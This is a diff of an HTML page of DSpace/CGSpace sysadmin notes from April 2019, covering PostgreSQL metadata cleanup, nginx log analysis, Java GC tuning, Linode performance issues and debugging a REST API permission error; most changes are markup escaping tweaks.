@ -529,7 +529,7 @@ X-XSS-Protection: 1; mode=block
<li><code>2408:8214:7a00:868f:7c1e:e0f3:20c6:c142</code> is some stupid Chinese bot making malicious POST requests</li>
<li>There are free database connections in the pool:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
7 dspaceCli
23 dspaceWeb
@ -546,7 +546,7 @@ X-XSS-Protection: 1; mode=block
</ul>
</li>
</ul>
<pre><code>$ lein run ~/src/git/DSpace/2019-02-22-affiliations.csv name id
<pre tabindex="0"><code>$ lein run ~/src/git/DSpace/2019-02-22-affiliations.csv name id
</code></pre><ul>
<li>After matching the values and creating some new matches I had trouble remembering how to copy the reconciled values to a new column
<ul>
@ -555,35 +555,35 @@ X-XSS-Protection: 1; mode=block
</ul>
</li>
</ul>
<pre><code>if(cell.recon.matched, cell.recon.match.name, value)
<pre tabindex="0"><code>if(cell.recon.matched, cell.recon.match.name, value)
</code></pre><ul>
<li>See the <a href="https://github.com/OpenRefine/OpenRefine/wiki/Variables#recon">OpenRefine variables documentation</a> for more notes about the <code>recon</code> object</li>
<li>I also noticed a handful of errors in our current list of affiliations so I corrected them:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2019-04-08-fix-13-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-04-08-fix-13-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct -d
</code></pre><ul>
<li>We should create a new list of affiliations to update our controlled vocabulary again</li>
<li>I dumped a list of the top 1500 affiliations:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 211 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-04-08-top-1500-affiliations.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 211 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-04-08-top-1500-affiliations.csv WITH CSV HEADER;
COPY 1500
</code></pre><ul>
<li>Fix a few more messed up affiliations that have return characters in them (use Ctrl-V Ctrl-M to re-create control character):</li>
</ul>
<pre><code>dspace=# UPDATE metadatavalue SET text_value='International Institute for Environment and Development' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'International Institute^M%';
dspace=# UPDATE metadatavalue SET text_value='Kenya Agriculture and Livestock Research Organization' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'Kenya Agricultural and Livestock Research^M%';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=&#39;International Institute for Environment and Development&#39; WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE &#39;International Institute^M%&#39;;
dspace=# UPDATE metadatavalue SET text_value=&#39;Kenya Agriculture and Livestock Research Organization&#39; WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE &#39;Kenya Agricultural and Livestock Research^M%&#39;;
</code></pre><ul>
<li>I noticed a bunch of subjects and affiliations that use stylized apostrophes so I will export those and then batch update them:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE '%%') to /tmp/2019-04-08-affiliations-apostrophes.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE &#39;%%&#39;) to /tmp/2019-04-08-affiliations-apostrophes.csv WITH CSV HEADER;
COPY 60
dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 57 AND text_value LIKE '%%') to /tmp/2019-04-08-subject-apostrophes.csv WITH CSV HEADER;
dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 57 AND text_value LIKE &#39;%%&#39;) to /tmp/2019-04-08-subject-apostrophes.csv WITH CSV HEADER;
COPY 20
</code></pre><ul>
<li>I cleaned them up in OpenRefine and then applied the fixes on CGSpace and DSpace Test:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-60-affiliations-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-60-affiliations-apostrophes.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct -d
$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.subject -m 57 -t correct -d
</code></pre><ul>
<li>UptimeRobot said that CGSpace (linode18) went down tonight
<ul>
@ -592,14 +592,14 @@ $ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db
</ul>
</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
7 dspaceCli
250 dspaceWeb
</code></pre><ul>
<li>On a related note I see connection pool errors in the DSpace log:</li>
</ul>
<pre><code>2019-04-08 19:01:10,472 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
<pre tabindex="0"><code>2019-04-08 19:01:10,472 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-319] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
</code></pre><ul>
<li>But still I see 10 to 30% CPU steal in <code>iostat</code> that is also reflected in the Munin graphs:</li>
@ -609,7 +609,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
<li>Linode Support still didn&rsquo;t respond to my ticket from yesterday, so I attached a new output of <code>iostat 1 10</code> and asked them to move the VM to a less busy host</li>
<li>The web server logs are not very busy:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &quot;08/Apr/2019:(17|18|19)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#34;08/Apr/2019:(17|18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
124 40.77.167.135
135 95.108.181.88
139 157.55.39.206
@ -620,7 +620,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
457 157.55.39.164
457 40.77.167.132
3822 45.5.184.72
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &quot;08/Apr/2019:(17|18|19)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;08/Apr/2019:(17|18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
5 129.0.79.206
5 41.205.240.21
7 207.46.13.95
@ -636,7 +636,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
<li>Linode sent an alert that CGSpace (linode18) was 440% CPU for the last two hours this morning</li>
<li>Here are the top IPs in the web server logs around that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &quot;09/Apr/2019:(06|07|08)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;09/Apr/2019:(06|07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
18 66.249.79.139
21 157.55.39.160
29 66.249.79.137
@ -647,7 +647,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
1166 45.5.184.72
4251 45.5.186.2
4895 205.186.128.185
# zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &quot;09/Apr/2019:(06|07|08)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#34;09/Apr/2019:(06|07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
200 144.48.242.108
202 207.46.13.185
206 18.194.46.84
@ -661,11 +661,11 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
</code></pre><ul>
<li><code>45.5.186.2</code> is at CIAT in Colombia and I see they are mostly making requests to the REST API, but also to XMLUI with the following user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
</code></pre><ul>
<li>Database connection usage looks fine:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
7 dspaceCli
11 dspaceWeb
@ -683,15 +683,15 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
<li>Abenet pointed out a possibility of validating funders against the <a href="https://support.crossref.org/hc/en-us/articles/215788143-Funder-data-via-the-API">CrossRef API</a></li>
<li>Note that if you use HTTPS and specify a contact address in the API request you have less likelihood of being blocked</li>
</ul>
<pre><code>$ http 'https://api.crossref.org/funders?query=mercator&amp;mailto=me@cgiar.org'
<pre tabindex="0"><code>$ http &#39;https://api.crossref.org/funders?query=mercator&amp;mailto=me@cgiar.org&#39;
</code></pre><ul>
<li>Otherwise, they provide the funder data in <a href="https://www.crossref.org/services/funder-registry/">CSV and RDF format</a></li>
<li>I did a quick test with the recent IITA records against reconcile-csv in OpenRefine and it matched a few, but the ones that didn&rsquo;t match will need a human to go and do some manual checking and informed decision making&hellip;</li>
<li>If I want to write a script for this I could use the Python <a href="https://habanero.readthedocs.io/en/latest/modules/crossref.html">habanero library</a>:</li>
</ul>
<pre><code>from habanero import Crossref
cr = Crossref(mailto=&quot;me@cgiar.org&quot;)
x = cr.funders(query = &quot;mercator&quot;)
<pre tabindex="0"><code>from habanero import Crossref
cr = Crossref(mailto=&#34;me@cgiar.org&#34;)
x = cr.funders(query = &#34;mercator&#34;)
</code></pre><h2 id="2019-04-11">2019-04-11</h2>
<ul>
<li>Continue proofing IITA&rsquo;s last round of batch uploads from <a href="https://dspacetest.cgiar.org/handle/10568/100333">March on DSpace Test</a> (20193rd.xls)
@ -720,8 +720,8 @@ x = cr.funders(query = &quot;mercator&quot;)
</li>
<li>I captured a few general corrections and deletions for AGROVOC subjects while looking at IITA&rsquo;s records, so I applied them to DSpace Test and CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2019-04-11-fix-14-subjects.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-04-11-fix-14-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.subject -m 57 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 57 -f dc.subject -d
</code></pre><ul>
<li>Answer more questions about DOIs and Altmetric scores from WLE</li>
<li>Answer more questions about DOIs and Altmetric scores from IWMI
@ -751,9 +751,9 @@ $ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspac
<p><img src="/cgspace-notes/2019/04/visualvm-solr-indexing-solr-settings.png" alt="Java GC during Solr indexing Solr 4.10.4 settings"></p>
<h2 id="2019-04-14">2019-04-14</h2>
<ul>
<li>Change DSpace Test (linode19) to use the Java GC tuning from the Solr 4.14.4 startup script:</li>
<li>Change DSpace Test (linode19) to use the Java GC tuning from the Solr 4.10.4 startup script:</li>
</ul>
<pre><code>GC_TUNE=&quot;-XX:NewRatio=3 \
<pre tabindex="0"><code>GC_TUNE=&#34;-XX:NewRatio=3 \
-XX:SurvivorRatio=4 \
-XX:TargetSurvivorRatio=90 \
-XX:MaxTenuringThreshold=8 \
@ -766,7 +766,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspac
-XX:CMSInitiatingOccupancyFraction=50 \
-XX:CMSMaxAbortablePrecleanTime=6000 \
-XX:+CMSParallelRemarkEnabled \
-XX:+ParallelRefProcEnabled&quot;
-XX:+ParallelRefProcEnabled&#34;
</code></pre><ul>
<li>I need to remember to check the Munin JVM graphs in a few days</li>
<li>It might be placebo, but the site <em>does</em> feel snappier&hellip;</li>
@ -786,19 +786,19 @@ $ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspac
</ul>
</li>
</ul>
<pre><code>import json
<pre tabindex="0"><code>import json
import re
import urllib
import urllib2
handle = re.findall('[0-9]+/[0-9]+', value)
handle = re.findall(&#39;[0-9]+/[0-9]+&#39;, value)
url = 'https://cgspace.cgiar.org/rest/handle/' + handle[0]
url = &#39;https://cgspace.cgiar.org/rest/handle/&#39; + handle[0]
req = urllib2.Request(url)
req.add_header('User-agent', 'Alan Python bot')
req.add_header(&#39;User-agent&#39;, &#39;Alan Python bot&#39;)
res = urllib2.urlopen(req)
data = json.load(res)
item_id = data['id']
item_id = data[&#39;id&#39;]
return item_id
</code></pre><ul>
@ -809,7 +809,7 @@ return item_id
</li>
<li>I ran a full Discovery indexing on CGSpace because I didn&rsquo;t do it after all the metadata updates last week:</li>
</ul>
<pre><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 82m45.324s
user 7m33.446s
@ -1001,7 +1001,7 @@ sys 2m13.463s
<li>For future reference, Linode mentioned that they consider CPU steal above 8% to be significant</li>
<li>Regarding the other Linode issue about speed, I did a test with <code>iperf</code> between linode18 and linode19:</li>
</ul>
<pre><code># iperf -s
<pre tabindex="0"><code># iperf -s
------------------------------------------------------------
Server listening on TCP port 5001
TCP window size: 85.3 KByte (default)
@ -1049,11 +1049,11 @@ TCP window size: 85.0 KByte (default)
</li>
<li>I want to get rid of this annoying warning that is constantly in our DSpace logs:</li>
</ul>
<pre><code>2019-04-08 19:02:31,770 WARN org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
<pre tabindex="0"><code>2019-04-08 19:02:31,770 WARN org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
</code></pre><ul>
<li>Apparently it happens once per request, which can be at least 1,500 times per day according to the DSpace logs on CGSpace (linode18):</li>
</ul>
<pre><code>$ grep -c 'Falling back to request address' dspace.log.2019-04-20
<pre tabindex="0"><code>$ grep -c &#39;Falling back to request address&#39; dspace.log.2019-04-20
dspace.log.2019-04-20:1515
</code></pre><ul>
<li>I will fix it in <code>dspace/config/modules/oai.cfg</code></li>
@ -1098,7 +1098,7 @@ dspace.log.2019-04-20:1515
</ul>
</li>
</ul>
<pre><code>$ csvcut -c id,dc.identifier.uri,'dc.identifier.uri[]' ~/Downloads/2019-04-24-IITA.csv &gt; /tmp/iita.csv
<pre tabindex="0"><code>$ csvcut -c id,dc.identifier.uri,&#39;dc.identifier.uri[]&#39; ~/Downloads/2019-04-24-IITA.csv &gt; /tmp/iita.csv
</code></pre><ul>
<li>Carlos Tejo from the Land Portal had been emailing me this week to ask about the old REST API that Tsega was building in 2017
<ul>
@ -1108,7 +1108,7 @@ dspace.log.2019-04-20:1515
</ul>
</li>
</ul>
<pre><code>$ curl -f -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -f -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
curl: (22) The requested URL returned error: 401
</code></pre><ul>
<li>Note that curl only shows the HTTP 401 error if you use <code>-f</code> (fail), and only then if you <em>don&rsquo;t</em> include <code>-s</code>
@ -1118,19 +1118,19 @@ curl: (22) The requested URL returned error: 401
</ul>
</li>
</ul>
<pre><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='en_US';
<pre tabindex="0"><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39; AND text_lang=&#39;en_US&#39;;
count
-------
376
(1 row)
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='';
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39; AND text_lang=&#39;&#39;;
count
-------
149
(1 row)
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang IS NULL;
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39; AND text_lang IS NULL;
count
-------
417
@ -1138,7 +1138,7 @@ dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AN
</code></pre><ul>
<li>I see that the HTTP 401 issue seems to be a bug due to an item that the user doesn&rsquo;t have permission to access&hellip; from the DSpace log:</li>
</ul>
<pre><code>2019-04-24 08:11:51,129 INFO org.dspace.rest.ItemsResource @ Looking for item with metadata(key=cg.subject.cpwf,value=WATER MANAGEMENT, language=en_US).
<pre tabindex="0"><code>2019-04-24 08:11:51,129 INFO org.dspace.rest.ItemsResource @ Looking for item with metadata(key=cg.subject.cpwf,value=WATER MANAGEMENT, language=en_US).
2019-04-24 08:11:51,231 INFO org.dspace.usage.LoggerUsageEventListener @ anonymous::view_item:handle=10568/72448
2019-04-24 08:11:51,238 INFO org.dspace.usage.LoggerUsageEventListener @ anonymous::view_item:handle=10568/72491
2019-04-24 08:11:51,243 INFO org.dspace.usage.LoggerUsageEventListener @ anonymous::view_item:handle=10568/75703
@ -1146,20 +1146,20 @@ dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AN
</code></pre><ul>
<li>Nevertheless, if I request using the <code>null</code> language I get 1020 results, plus 179 for a blank language attribute:</li>
</ul>
<pre><code>$ curl -s -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: null}' | jq length
<pre tabindex="0"><code>$ curl -s -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: null}&#39; | jq length
1020
$ curl -s -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: &quot;&quot;}' | jq length
$ curl -s -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;&#34;}&#39; | jq length
179
</code></pre><ul>
<li>This is weird because I see 9421156 items with &ldquo;WATER MANAGEMENT&rdquo; (depending on wildcard matching for errors in subject spelling):</li>
</ul>
<pre><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT';
<pre tabindex="0"><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39;;
count
-------
942
(1 row)
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value LIKE '%WATER MANAGEMENT%';
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value LIKE &#39;%WATER MANAGEMENT%&#39;;
count
-------
1156
@ -1177,13 +1177,13 @@ dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AN
</li>
<li>I tested the REST API after logging in with my super admin account and I was able to get results for the problematic query:</li>
</ul>
<pre><code>$ curl -f -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/login&quot; -d '{&quot;email&quot;:&quot;example@me.com&quot;,&quot;password&quot;:&quot;fuuuuu&quot;}'
$ curl -f -H &quot;Content-Type: application/json&quot; -H &quot;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&quot; -X GET &quot;https://dspacetest.cgiar.org/rest/status&quot;
$ curl -f -H &quot;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -f -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/login&#34; -d &#39;{&#34;email&#34;:&#34;example@me.com&#34;,&#34;password&#34;:&#34;fuuuuu&#34;}&#39;
$ curl -f -H &#34;Content-Type: application/json&#34; -H &#34;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&#34; -X GET &#34;https://dspacetest.cgiar.org/rest/status&#34;
$ curl -f -H &#34;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
</code></pre><ul>
<li>I created a normal user for Carlos to try as an unprivileged user:</li>
</ul>
<pre><code>$ dspace user --add --givenname Carlos --surname Tejo --email blah@blah.com --password 'ddmmdd'
<pre tabindex="0"><code>$ dspace user --add --givenname Carlos --surname Tejo --email blah@blah.com --password &#39;ddmmdd&#39;
</code></pre><ul>
<li>But still I get the HTTP 401 and I have no idea which item is causing it</li>
<li>I enabled more verbose logging in <code>ItemsResource.java</code> and now I can at least see the item ID that causes the failure&hellip;
@ -1192,7 +1192,7 @@ $ curl -f -H &quot;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&quot;
</ul>
</li>
</ul>
<pre><code>dspace=# SELECT * FROM item WHERE item_id=74648;
<pre tabindex="0"><code>dspace=# SELECT * FROM item WHERE item_id=74648;
item_id | submitter_id | in_archive | withdrawn | last_modified | owning_collection | discoverable
---------+--------------+------------+-----------+----------------------------+-------------------+--------------
74648 | 113 | f | f | 2016-03-30 09:00:52.131+00 | | t
@ -1212,7 +1212,7 @@ $ curl -f -H &quot;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&quot;
<ul>
<li>Export a list of authors for Peter to look through:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-04-26-all-authors.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-04-26-all-authors.csv with csv header;
COPY 65752
</code></pre><h2 id="2019-04-28">2019-04-28</h2>
<ul>
@ -1222,7 +1222,7 @@ COPY 65752
</ul>
</li>
</ul>
<pre><code>dspace=# SELECT * FROM item WHERE item_id=74648;
<pre tabindex="0"><code>dspace=# SELECT * FROM item WHERE item_id=74648;
item_id | submitter_id | in_archive | withdrawn | last_modified | owning_collection | discoverable
---------+--------------+------------+-----------+----------------------------+-------------------+--------------
74648 | 113 | f | f | 2019-04-28 08:48:52.114-07 | | f
@ -1230,7 +1230,7 @@ COPY 65752
</code></pre><ul>
<li>And I tried the <code>curl</code> command from above again, but I still get the HTTP 401 and and the same error in the DSpace log:</li>
</ul>
<pre><code>2019-04-28 08:53:07,170 ERROR org.dspace.rest.ItemsResource @ User(anonymous) has not permission to read item(id=74648)!
<pre tabindex="0"><code>2019-04-28 08:53:07,170 ERROR org.dspace.rest.ItemsResource @ User(anonymous) has not permission to read item(id=74648)!
</code></pre><ul>
<li>I even tried to &ldquo;expunge&rdquo; the item using an <a href="https://wiki.lyrasis.org/display/DSDOC5x/Batch+Metadata+Editing#BatchMetadataEditing-Performing'actions'onitems">action in CSV</a>, and it said &ldquo;EXPUNGED!&rdquo; but the item is still there&hellip;</li>
</ul>
@ -1239,7 +1239,7 @@ COPY 65752
<li>Send mail to the dspace-tech mailing list to ask about the item expunge issue</li>
<li>Delete and re-create Podman container for dspacedb after pulling a new PostgreSQL container:</li>
</ul>
<pre><code>$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
<pre tabindex="0"><code>$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
</code></pre><ul>
<li>Carlos from LandPortal asked if I could export CGSpace in a machine-readable format so I think I&rsquo;ll try to do a CSV
<ul>
@ -1247,7 +1247,7 @@ COPY 65752
</ul>
</li>
</ul>
<pre><code>dspace=# SELECT DISTINCT text_lang, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id != 28 GROUP BY text_lang;
<pre tabindex="0"><code>dspace=# SELECT DISTINCT text_lang, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id != 28 GROUP BY text_lang;
text_lang | count
-----------+---------
| 358647
@ -1262,11 +1262,11 @@ COPY 65752
spa | 2
| 1074345
(11 rows)
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;ethnob&#39;, &#39;en&#39;, &#39;*&#39;, &#39;E.&#39;, &#39;&#39;);
UPDATE 360295
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
